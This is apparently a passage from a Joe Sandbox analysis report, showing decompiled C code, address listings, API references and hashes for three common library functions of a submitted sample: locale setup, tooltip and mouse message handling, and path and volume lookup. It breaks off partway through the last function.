                  • Instruction ID: 7289857ab61adf7b4a353bb28ab849fa169669fa0404094dea338f5cccf6774d
                  • Opcode Fuzzy Hash: 1592d7604d7e71ef99574a7cbd0b9e400da60f1e698cbef6546b2b55b08ba799
                  • Instruction Fuzzy Hash: FF3151E2E4430076E5107A726C4BF1B299C9B9576EF05043AF905BB2D2F9BDDA0442AB
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions

                  Function 00440CFD, Relevance: 66.4, APIs: 44, Instructions: 432COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00440CFD(signed int __eax, void* __esi) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v20;
				signed int _t142;
				signed int _t145;
				signed int _t148;
				signed int _t151;
				signed int _t154;
				signed int _t157;
				signed int _t159;
				signed int _t162;
				signed int _t165;
				signed int _t168;
				signed int _t171;
				signed int _t174;
				signed int _t177;
				signed int _t180;
				signed int _t183;
				signed int _t186;
				signed int _t189;
				signed int _t192;
				signed int _t195;
				signed int _t198;
				signed int _t201;
				signed int _t204;
				signed int _t207;
				signed int _t210;
				signed int _t213;
				signed int _t216;
				signed int _t219;
				signed int _t222;
				signed int _t225;
				signed int _t228;
				signed int _t231;
				signed int _t234;
				signed int _t237;
				signed int _t240;
				signed int _t243;
				signed int _t246;
				signed int _t249;
				signed int _t252;
				signed int _t255;
				signed int _t258;
				signed int _t261;
				signed int _t264;
				signed int _t267;
				signed int _t270;
				signed int _t276;

				_t278 =  *(__eax + 0x42) & 0x0000ffff;
				_t279 =  *(__eax + 0x44) & 0x0000ffff;
				_v8 =  *(__eax + 0x42) & 0x0000ffff;
				_v12 =  *(__eax + 0x44) & 0x0000ffff;
				if(__esi != 0) {
					_v16 = _v16 & 0x00000000;
					_v20 = __eax;
					_t142 = E0043C0B5(_t279,  &_v20, 1, _t278, 0x31, __esi + 4);
					_t145 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x32, __esi + 8);
					_t148 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x33, __esi + 0xc);
					_t151 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x34, __esi + 0x10);
					_t154 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x35, __esi + 0x14);
					_t157 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x36, __esi + 0x18);
					_t159 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x37, __esi);
					_t162 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x2a, __esi + 0x20);
					_t165 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x2b, __esi + 0x24);
					_t168 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x2c, __esi + 0x28);
					_t171 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x2d, __esi + 0x2c);
					_t174 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x2e, __esi + 0x30);
					_t177 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x2f, __esi + 0x34);
					_t180 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x30, __esi + 0x1c);
					_t183 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x44, __esi + 0x38);
					_t186 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x45, __esi + 0x3c);
					_t189 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x46, __esi + 0x40);
					_t192 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x47, __esi + 0x44);
					_t195 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x48, __esi + 0x48);
					_t198 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x49, __esi + 0x4c);
					_t201 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x4a, __esi + 0x50);
					_t204 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x4b, __esi + 0x54);
					_t207 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x4c, __esi + 0x58);
					_t210 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x4d, __esi + 0x5c);
					_t213 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x4e, __esi + 0x60);
					_t216 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x4f, __esi + 0x64);
					_t219 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x38, __esi + 0x68);
					_t222 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x39, __esi + 0x6c);
					_t225 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x3a, __esi + 0x70);
					_t228 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x3b, __esi + 0x74);
					_t231 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x3c, __esi + 0x78);
					_t234 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x3d, __esi + 0x7c);
					_t237 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x3e, __esi + 0x80);
					_t240 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x3f, __esi + 0x84);
					_t243 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x40, __esi + 0x88);
					_t246 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x41, __esi + 0x8c);
					_t249 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x42, __esi + 0x90);
					_t252 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x43, __esi + 0x94);
					_t255 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x28, __esi + 0x98);
					_t258 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x29, __esi + 0x9c);
					_t261 = E0043C0B5(_t279,  &_v20, 1, _v12, 0x1f, __esi + 0xa0);
					_t264 = E0043C0B5(_t279,  &_v20, 1, _v12, 0x20, __esi + 0xa4);
					_t267 = E0043C0B5(_t279,  &_v20, 1, _v12, 0x1003, __esi + 0xa8);
					_t276 = _v12;
					_t270 = E0043C0B5(_t279,  &_v20, 0, _t276, 0x1009, __esi + 0xb0);
					 *(__esi + 0xac) = _t276;
					return _t142 | _t145 | _t148 | _t151 | _t154 | _t157 | _t159 | _t162 | _t165 | _t168 | _t171 | _t174 | _t177 | _t180 | _t183 | _t186 | _t189 | _t192 | _t195 | _t198 | _t201 | _t204 | _t207 | _t210 | _t213 | _t216 | _t219 | _t222 | _t225 | _t228 | _t231 | _t234 | _t237 | _t240 | _t243 | _t246 | _t249 | _t252 | _t255 | _t258 | _t261 | _t264 | _t267 | _t270;
				} else {
					return __eax | 0xffffffff;
				}
			}




















































                  0x00440d05
                  0x00440d09
                  0x00440d0d
                  0x00440d10
                  0x00440d15
                  0x00440d1c
                  0x00440d22
                  0x00440d34
                  0x00440d49
                  0x00440d5e
                  0x00440d73
                  0x00440d8b
                  0x00440da0
                  0x00440db2
                  0x00440dc7
                  0x00440ddf
                  0x00440df4
                  0x00440e09
                  0x00440e1e
                  0x00440e36
                  0x00440e4b
                  0x00440e60
                  0x00440e75
                  0x00440e8d
                  0x00440ea2
                  0x00440eb7
                  0x00440ecc
                  0x00440ee4
                  0x00440ef9
                  0x00440f0e
                  0x00440f23
                  0x00440f3b
                  0x00440f50
                  0x00440f65
                  0x00440f7a
                  0x00440f92
                  0x00440fa7
                  0x00440fbc
                  0x00440fd1
                  0x00440fec
                  0x00441004
                  0x0044101c
                  0x00441034
                  0x0044104f
                  0x00441067
                  0x0044107f
                  0x00441097
                  0x004410b2
                  0x004410ca
                  0x004410e5
                  0x004410f8
                  0x00441102
                  0x0044110f
                  0x00441117
                  0x00440d17
                  0x00440d1b
                  0x00440d1b

                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ___getlocaleinfo
                  • String ID:
                  • API String ID: 1937885557-0
                  • Opcode ID: 9053ce3c1f0c1ff8f56ed28a358241bbee1eb6b9847517bbb92b560b8be99c02
                  • Instruction ID: 59fd04f248aebe5f6f2e84f9c40bf99b053675ffa63a6a04f46dc497c744b53e
                  • Opcode Fuzzy Hash: 9053ce3c1f0c1ff8f56ed28a358241bbee1eb6b9847517bbb92b560b8be99c02
                  • Instruction Fuzzy Hash: 95E1D0B290024DFEEF12DAE1CD81DFF77BDEB08748F04055BB255E2041EA75AA059B64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0042EEC9, Relevance: 35.3, APIs: 19, Strings: 1, Instructions: 323windowkeyboardCOMMON
                  Download Yara Rule
                  C-Code - Quality: 93%
                  			E0042EEC9(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t114;
				signed int _t116;
				signed int _t118;
				intOrPtr _t122;
				long _t131;
				signed int _t138;
				signed int _t139;
				void* _t143;
				signed int _t147;
				signed int _t148;
				void* _t156;
				intOrPtr* _t163;
				signed int _t175;
				signed int _t176;
				signed int _t179;
				void* _t181;
				signed short _t190;
				intOrPtr _t192;
				void* _t200;
				void* _t204;
				void* _t205;
				void* _t207;

				_t165 = __ecx;
				_push(0x7c);
				_t109 = E00431A9B(E0044CA27, __ebx, __edi, __esi);
				_t200 = __ecx;
				 *(_t204 - 0x10) = __ecx;
				_t163 =  *((intOrPtr*)(_t204 + 8));
				_t190 =  *(_t163 + 4);
				 *(_t204 - 0x1c) = _t190;
				if(_t190 == 0x200 || _t190 == 0xa0 || _t190 == 0x202 || _t190 == 0x205 || _t190 == 0x208) {
					if(GetKeyState(1) < 0 || GetKeyState(2) < 0) {
						L49:
						_t190 =  *(_t204 - 0x1c);
						goto L50;
					} else {
						_t109 = GetKeyState(4);
						_t217 = _t109;
						if(_t109 < 0) {
							goto L49;
						} else {
							_t114 = E0041F396(_t163, _t165, GetKeyState, _t200, _t217);
							_push( *_t163);
							_t192 = _t114;
							 *((intOrPtr*)(_t204 - 0x18)) = _t192;
							while(1) {
								_t109 = E0040EE3C(_t163, _t165);
								if(_t109 == 0) {
									break;
								}
								__eflags =  *(_t109 + 0x3c) & 0x00000401;
								if(( *(_t109 + 0x3c) & 0x00000401) != 0) {
									break;
								} else {
									_push(GetParent( *(_t109 + 0x20)));
									continue;
								}
							}
							if(_t109 == _t200) {
								_t164 =  *(_t192 + 0x3c);
								 *(_t204 - 0x14) = E0040F142(_t200);
								__eflags = _t164;
								if(__eflags == 0) {
									L19:
									_t116 = E00404461(__eflags, 0x70);
									 *(_t204 - 0x1c) = _t116;
									_t164 = 0;
									 *(_t204 - 4) = 0;
									__eflags = _t116;
									if(__eflags != 0) {
										_t164 = E0042EBE0(0, _t116, _t192, _t200, __eflags);
									}
									 *(_t204 - 4) =  *(_t204 - 4) | 0xffffffff;
									_t118 =  *((intOrPtr*)( *_t164 + 0x13c))( *(_t204 - 0x14), 1);
									__eflags = _t118;
									if(_t118 != 0) {
										SendMessageA( *(_t164 + 0x20), 0x401, 0, 0);
										_t200 =  *(_t204 - 0x10);
										 *(_t192 + 0x3c) = _t164;
										L24:
										E00431160(_t192, _t204 - 0x88, 0, 0x30);
										_t122 =  *((intOrPtr*)(_t204 + 8));
										 *((intOrPtr*)(_t204 - 0x24)) =  *((intOrPtr*)(_t122 + 0x18));
										 *(_t204 - 0x28) =  *(_t122 + 0x14);
										ScreenToClient( *(_t200 + 0x20), _t204 - 0x28);
										E00431160(_t192, _t204 - 0x58, 0, 0x30);
										_t207 = _t205 + 0x18;
										 *(_t204 - 0x58) = 0x2c;
										_t109 =  *((intOrPtr*)( *_t200 + 0x74))( *(_t204 - 0x28),  *((intOrPtr*)(_t204 - 0x24)), _t204 - 0x58);
										asm("sbb ecx, ecx");
										_t175 =  ~(_t109 + 1) & _t200;
										 *(_t204 - 0x1c) = _t109;
										 *(_t204 - 0x14) = _t175;
										__eflags =  *(_t192 + 0x44) - _t109;
										if( *(_t192 + 0x44) != _t109) {
											L30:
											__eflags = _t109 - 0xffffffff;
											if(_t109 == 0xffffffff) {
												SendMessageA( *(_t164 + 0x20), 0x401, 0, 0);
												L39:
												E0042EE49(_t164,  *((intOrPtr*)(_t204 + 8)));
												_t131 =  *(_t192 + 0x48);
												__eflags = _t131;
												if(_t131 != 0) {
													__eflags =  *_t131 - 0x2c;
													if( *_t131 >= 0x2c) {
														SendMessageA( *(_t164 + 0x20), 0x405, 0, _t131);
													}
												}
												 *(_t192 + 0x40) =  *(_t204 - 0x14);
												 *(_t192 + 0x44) =  *(_t204 - 0x1c);
												__eflags =  *(_t192 + 0x48);
												if(__eflags == 0) {
													 *(_t192 + 0x48) = E00404461(__eflags, 0x30);
													E00431160(_t192, _t134, 0, 0x30);
													_t207 = _t207 + 0x10;
												}
												_t176 = 0xc;
												_t200 = _t204 - 0x58;
												_t109 = memcpy( *(_t192 + 0x48), _t200, _t176 << 2);
												_t192 = _t200 + _t176 + _t176;
												L45:
												__eflags =  *((intOrPtr*)(_t204 - 0x34)) - 0xffffffff;
												if( *((intOrPtr*)(_t204 - 0x34)) != 0xffffffff) {
													__eflags =  *(_t204 - 0x38);
													if(__eflags == 0) {
														_push( *((intOrPtr*)(_t204 - 0x34)));
														_t109 = E004316F6(_t164, _t192, _t200, __eflags);
													}
												}
												goto L77;
											}
											_t179 = 0xc;
											_t138 = memcpy(_t204 - 0x88, _t204 - 0x58, _t179 << 2);
											_t207 = _t207 + 0xc;
											_t181 =  *(_t204 - 0x10);
											_t139 = _t138 & 0x3fffffff;
											 *(_t204 - 0x84) = _t139;
											__eflags =  *(_t181 + 0x3c) & 0x00000400;
											if(( *(_t181 + 0x3c) & 0x00000400) != 0) {
												_t148 = _t139 | 0x00000020;
												__eflags = _t148;
												 *(_t204 - 0x84) = _t148;
											}
											SendMessageA( *(_t164 + 0x20), 0x404, 0, _t204 - 0x88);
											__eflags =  *(_t204 - 0x54) & 0x40000000;
											if(( *(_t204 - 0x54) & 0x40000000) != 0) {
												L35:
												SendMessageA( *(_t164 + 0x20), 0x401, 1, 0);
												_t143 =  *(_t204 - 0x10);
												__eflags =  *(_t143 + 0x3c) & 0x00000400;
												if(( *(_t143 + 0x3c) & 0x00000400) != 0) {
													SendMessageA( *(_t164 + 0x20), 0x411, 1, _t204 - 0x88);
												}
												SetWindowPos( *(_t164 + 0x20), 0, 0, 0, 0, 0, 0x213);
												goto L38;
											} else {
												_t147 = E004117D8( *(_t204 - 0x10));
												__eflags = _t147;
												if(_t147 == 0) {
													L38:
													_t192 =  *((intOrPtr*)(_t204 - 0x18));
													goto L39;
												}
												goto L35;
											}
										}
										__eflags =  *(_t192 + 0x40) - _t175;
										if( *(_t192 + 0x40) != _t175) {
											goto L30;
										}
										__eflags =  *(_t200 + 0x3c) & 0x00000400;
										if(( *(_t200 + 0x3c) & 0x00000400) == 0) {
											__eflags = _t109 - 0xffffffff;
											if(_t109 != 0xffffffff) {
												_t109 = E0042EE49(_t164,  *((intOrPtr*)(_t204 + 8)));
											}
										} else {
											GetCursorPos(_t204 - 0x20);
											_t109 = SendMessageA( *(_t164 + 0x20), 0x412, 0, ( *(_t204 - 0x1c) & 0x0000ffff) << 0x00000010 |  *(_t204 - 0x20) & 0x0000ffff);
										}
										goto L45;
									} else {
										_t109 =  *((intOrPtr*)( *_t164 + 4))(1);
										goto L77;
									}
								}
								_t156 = E00410293(_t164);
								__eflags = _t156 -  *(_t204 - 0x14);
								if(_t156 !=  *(_t204 - 0x14)) {
									 *((intOrPtr*)( *_t164 + 0x60))();
									 *((intOrPtr*)( *_t164 + 4))(1);
									_t164 = 0;
									__eflags = 0;
									 *(_t192 + 0x3c) = 0;
								}
								__eflags = _t164;
								if(__eflags != 0) {
									goto L24;
								} else {
									goto L19;
								}
							} else {
								if(_t109 == 0) {
									 *(_t192 + 0x40) =  *(_t192 + 0x40) & _t109;
									 *(_t192 + 0x44) =  *(_t192 + 0x44) | 0xffffffff;
								}
								goto L77;
							}
						}
					}
				} else {
					L50:
					__eflags =  *(_t200 + 0x3c) & 0x00000401;
					if(( *(_t200 + 0x3c) & 0x00000401) == 0) {
						L77:
						return E00431B73(_t109);
					}
					_push( *_t163);
					while(1) {
						_t109 = E0040EE3C(_t163, _t165);
						__eflags = _t109;
						if(_t109 == 0) {
							break;
						}
						__eflags = _t109 - _t200;
						if(_t109 == _t200) {
							L57:
							__eflags = _t190 - 0x100;
							if(_t190 < 0x100) {
								L59:
								__eflags = _t190 - 0x104 - 3;
								if(_t190 - 0x104 > 3) {
									_t109 = 0;
									__eflags = 0;
									L62:
									__eflags =  *(_t200 + 0x3c) & 0x00000400;
									if(( *(_t200 + 0x3c) & 0x00000400) != 0) {
										goto L77;
									}
									__eflags = _t109;
									if(__eflags != 0) {
										L76:
										_t109 = E0040D89A(_t165, __eflags, _t109);
										goto L77;
									}
									__eflags = _t190 - 0x201;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0x203;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0x204;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0x206;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0x207;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0x209;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0xa1;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0xa3;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0xa4;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0xa6;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0xa7;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0xa9;
									if(__eflags != 0) {
										goto L77;
									}
									goto L76;
								}
								L60:
								_t109 = 1;
								goto L62;
							}
							__eflags = _t190 - 0x109;
							if(_t190 <= 0x109) {
								goto L60;
							}
							goto L59;
						}
						__eflags =  *(_t109 + 0x3c) & 0x00000401;
						if(( *(_t109 + 0x3c) & 0x00000401) != 0) {
							break;
						}
						_push(GetParent( *(_t109 + 0x20)));
					}
					__eflags = _t109 - _t200;
					if(_t109 != _t200) {
						goto L77;
					}
					goto L57;
				}
			}

























                  0x0042eec9
                  0x0042eec9
                  0x0042eed0
                  0x0042eed5
                  0x0042eed7
                  0x0042eeda
                  0x0042eedd
                  0x0042eee0
                  0x0042eee9
                  0x0042ef1c
                  0x0042f20b
                  0x0042f20b
                  0x00000000
                  0x0042ef2f
                  0x0042ef31
                  0x0042ef33
                  0x0042ef36
                  0x00000000
                  0x0042ef3c
                  0x0042ef3c
                  0x0042ef41
                  0x0042ef43
                  0x0042ef45
                  0x0042ef5d
                  0x0042ef5d
                  0x0042ef64
                  0x00000000
                  0x00000000
                  0x0042ef4a
                  0x0042ef51
                  0x00000000
                  0x0042ef53
                  0x0042ef5c
                  0x00000000
                  0x0042ef5c
                  0x0042ef51
                  0x0042ef68
                  0x0042ef7e
                  0x0042ef88
                  0x0042ef8b
                  0x0042ef8d
                  0x0042efb4
                  0x0042efb6
                  0x0042efbc
                  0x0042efbf
                  0x0042efc1
                  0x0042efc4
                  0x0042efc6
                  0x0042efcf
                  0x0042efcf
                  0x0042efd3
                  0x0042efde
                  0x0042efe4
                  0x0042efe6
                  0x0042f002
                  0x0042f008
                  0x0042f00b
                  0x0042f00e
                  0x0042f019
                  0x0042f01e
                  0x0042f02a
                  0x0042f034
                  0x0042f037
                  0x0042f045
                  0x0042f04c
                  0x0042f05b
                  0x0042f062
                  0x0042f06a
                  0x0042f06c
                  0x0042f06e
                  0x0042f071
                  0x0042f074
                  0x0042f077
                  0x0042f0cb
                  0x0042f0cb
                  0x0042f0ce
                  0x0042f200
                  0x0042f179
                  0x0042f17d
                  0x0042f182
                  0x0042f187
                  0x0042f189
                  0x0042f18b
                  0x0042f18e
                  0x0042f19a
                  0x0042f19a
                  0x0042f18e
                  0x0042f1a3
                  0x0042f1a9
                  0x0042f1ac
                  0x0042f1af
                  0x0042f1bc
                  0x0042f1bf
                  0x0042f1c4
                  0x0042f1c4
                  0x0042f1cc
                  0x0042f1cd
                  0x0042f1d0
                  0x0042f1d0
                  0x0042f1d2
                  0x0042f1d2
                  0x0042f1d6
                  0x0042f1dc
                  0x0042f1e0
                  0x0042f1e6
                  0x0042f1e9
                  0x0042f1ee
                  0x0042f1e0
                  0x00000000
                  0x0042f1d6
                  0x0042f0d9
                  0x0042f0e3
                  0x0042f0e3
                  0x0042f0e5
                  0x0042f0e8
                  0x0042f0f2
                  0x0042f0f8
                  0x0042f0fb
                  0x0042f0fd
                  0x0042f0fd
                  0x0042f100
                  0x0042f100
                  0x0042f118
                  0x0042f11e
                  0x0042f125
                  0x0042f133
                  0x0042f13e
                  0x0042f144
                  0x0042f147
                  0x0042f14a
                  0x0042f15d
                  0x0042f15d
                  0x0042f170
                  0x00000000
                  0x0042f127
                  0x0042f12a
                  0x0042f12f
                  0x0042f131
                  0x0042f176
                  0x0042f176
                  0x00000000
                  0x0042f176
                  0x00000000
                  0x0042f131
                  0x0042f125
                  0x0042f079
                  0x0042f07c
                  0x00000000
                  0x00000000
                  0x0042f07e
                  0x0042f085
                  0x0042f0b4
                  0x0042f0b7
                  0x0042f0c1
                  0x0042f0c1
                  0x0042f087
                  0x0042f08b
                  0x0042f0a9
                  0x0042f0a9
                  0x00000000
                  0x0042efe8
                  0x0042efee
                  0x00000000
                  0x0042efee
                  0x0042efe6
                  0x0042ef91
                  0x0042ef96
                  0x0042ef99
                  0x0042ef9f
                  0x0042efa8
                  0x0042efab
                  0x0042efab
                  0x0042efad
                  0x0042efad
                  0x0042efb0
                  0x0042efb2
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042ef6a
                  0x0042ef6c
                  0x0042ef72
                  0x0042ef75
                  0x0042ef75
                  0x00000000
                  0x0042ef6c
                  0x0042ef68
                  0x0042ef36
                  0x0042f20e
                  0x0042f20e
                  0x0042f20e
                  0x0042f215
                  0x0042f2dc
                  0x0042f2e1
                  0x0042f2e1
                  0x0042f21b
                  0x0042f236
                  0x0042f236
                  0x0042f23b
                  0x0042f23d
                  0x00000000
                  0x00000000
                  0x0042f21f
                  0x0042f221
                  0x0042f247
                  0x0042f247
                  0x0042f24d
                  0x0042f257
                  0x0042f25d
                  0x0042f260
                  0x0042f267
                  0x0042f267
                  0x0042f269
                  0x0042f269
                  0x0042f270
                  0x00000000
                  0x00000000
                  0x0042f272
                  0x0042f274
                  0x0042f2d6
                  0x0042f2d7
                  0x00000000
                  0x0042f2d7
                  0x0042f276
                  0x0042f27c
                  0x00000000
                  0x00000000
                  0x0042f27e
                  0x0042f284
                  0x00000000
                  0x00000000
                  0x0042f286
                  0x0042f28c
                  0x00000000
                  0x00000000
                  0x0042f28e
                  0x0042f294
                  0x00000000
                  0x00000000
                  0x0042f296
                  0x0042f29c
                  0x00000000
                  0x00000000
                  0x0042f29e
                  0x0042f2a4
                  0x00000000
                  0x00000000
                  0x0042f2a6
                  0x0042f2ac
                  0x00000000
                  0x00000000
                  0x0042f2ae
                  0x0042f2b4
                  0x00000000
                  0x00000000
                  0x0042f2b6
                  0x0042f2bc
                  0x00000000
                  0x00000000
                  0x0042f2be
                  0x0042f2c4
                  0x00000000
                  0x00000000
                  0x0042f2c6
                  0x0042f2cc
                  0x00000000
                  0x00000000
                  0x0042f2ce
                  0x0042f2d4
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042f2d4
                  0x0042f262
                  0x0042f264
                  0x00000000
                  0x0042f264
                  0x0042f24f
                  0x0042f255
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042f255
                  0x0042f223
                  0x0042f22a
                  0x00000000
                  0x00000000
                  0x0042f235
                  0x0042f235
                  0x0042f23f
                  0x0042f241
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042f241

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0042EED0
                  • GetKeyState.USER32(00000001), ref: 0042EF17
                  • GetKeyState.USER32(00000002), ref: 0042EF24
                  • GetKeyState.USER32(00000004), ref: 0042EF31
                  • GetParent.USER32(?), ref: 0042EF56
                  • SendMessageA.USER32(?,00000401,00000000,00000000), ref: 0042F002
                  • _memset.LIBCMT ref: 0042F019
                  • ScreenToClient.USER32 ref: 0042F037
                  • _memset.LIBCMT ref: 0042F045
                  • GetCursorPos.USER32(?), ref: 0042F08B
                  • SendMessageA.USER32(?,00000412,00000000,?), ref: 0042F0A9
                  • SendMessageA.USER32(?,00000404,00000000,?), ref: 0042F118
                  • SendMessageA.USER32(?,00000401,00000001,00000000), ref: 0042F13E
                  • SendMessageA.USER32(?,00000411,00000001,?), ref: 0042F15D
                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000213), ref: 0042F170
                  • SendMessageA.USER32(?,00000405,00000000,?), ref: 0042F19A
                  • _memset.LIBCMT ref: 0042F1BF
                  • SendMessageA.USER32(?,00000401,00000000,00000000), ref: 0042F200
                  • GetParent.USER32(?), ref: 0042F22F
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MessageSend$State_memset$Parent$ClientCursorH_prolog3ScreenWindow
                  • String ID: ,
                  • API String ID: 2864161637-3772416878
                  • Opcode ID: cc3f7c5fffe2767f941653c96adc54678b203323e82f91da59ebd024d0d2e5c4
                  • Instruction ID: 12e6ef49b556adbd16c397df292db5107c7fbfc968b24c64fcc66a0911b4c434
                  • Opcode Fuzzy Hash: cc3f7c5fffe2767f941653c96adc54678b203323e82f91da59ebd024d0d2e5c4
                  • Instruction Fuzzy Hash: 74C1C175B00225DFDF209F65D889BAE7B71BB05300FC1007BEA05E62E1D7799845CB59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00429112, Relevance: 12.1, APIs: 8, Instructions: 125filestringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 98%
                  			E00429112(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				CHAR* _t45;
				long _t46;
				CHAR* _t50;
				long _t55;
				void* _t57;
				int _t63;
				long _t73;
				void* _t86;
				void* _t89;
				CHAR* _t91;
				void* _t94;
				CHAR* _t99;
				CHAR* _t101;

				_t92 = __esi;
				_t89 = __edx;
				_push(0x158);
				E00431B04(E0044C60B, __ebx, __edi, __esi);
				_t91 =  *(_t94 + 8);
				_t45 =  *(_t94 + 0xc);
				_t73 =  *(_t94 + 0x10);
				_t99 = _t91;
				_t75 = 0 | _t99 != 0x00000000;
				 *(_t94 - 0x158) = _t45;
				_t100 = _t99 != 0;
				if(_t99 != 0) {
					L2:
					_t101 = _t45;
					_t75 = 0 | _t101 != 0x00000000;
					if(_t101 != 0) {
						goto L1;
					}
					_t77 = _t94 - 0x15c;
					_t46 = GetFullPathNameA(_t45, 0x104, _t91, _t94 - 0x15c);
					if(_t46 != 0) {
						__eflags = _t46 - 0x104;
						if(_t46 < 0x104) {
							E004014C0(_t94 - 0x154, _t89);
							 *(_t94 - 4) =  *(_t94 - 4) & 0x00000000;
							E00428F81(_t73, __eflags, _t91, _t94 - 0x154);
							_t50 = PathIsUNCA( *(_t94 - 0x154));
							__eflags = _t50;
							if(_t50 != 0) {
								L21:
								E004010B0( &(( *(_t94 - 0x154))[0xfffffffffffffff0]), _t89);
								__eflags = 1;
								goto L22;
							}
							_t55 = GetVolumeInformationA( *(_t94 - 0x154), _t50, _t50, _t50, _t94 - 0x164, _t94 - 0x160, _t50, _t50);
							__eflags = _t55;
							if(_t55 != 0) {
								__eflags =  *(_t94 - 0x160) & 0x00000002;
								if(( *(_t94 - 0x160) & 0x00000002) == 0) {
									CharUpperA(_t91);
								}
								__eflags =  *(_t94 - 0x160) & 0x00000004;
								if(( *(_t94 - 0x160) & 0x00000004) == 0) {
									_t57 = FindFirstFileA( *(_t94 - 0x158), _t94 - 0x150);
									__eflags = _t57 - 0xffffffff;
									if(_t57 == 0xffffffff) {
										goto L21;
									}
									FindClose(_t57);
									__eflags =  *(_t94 - 0x15c);
									if( *(_t94 - 0x15c) == 0) {
										goto L11;
									}
									__eflags =  *(_t94 - 0x15c) - _t91;
									if( *(_t94 - 0x15c) <= _t91) {
										goto L11;
									}
									_t63 = lstrlenA(_t94 - 0x124);
									_t86 =  *(_t94 - 0x15c) - _t91;
									__eflags = _t63 + _t86 - 0x104;
									if(_t63 + _t86 >= 0x104) {
										__eflags = _t73;
										if(_t73 != 0) {
											 *((intOrPtr*)(_t73 + 8)) = 3;
											E00402CA0(_t73 + 0x10, 0x104,  *(_t94 - 0x158));
										}
										L12:
										E004010B0( &(( *(_t94 - 0x154))[0xfffffffffffffff0]), _t89);
										goto L5;
									}
									__eflags = 0x104;
									E00414FEE(_t73, _t89, _t91, 0x104,  *(_t94 - 0x15c), 0x104, _t94 - 0x124);
								}
								goto L21;
							}
							L11:
							E004290E3(_t73,  *(_t94 - 0x158));
							goto L12;
						}
						__eflags = _t73;
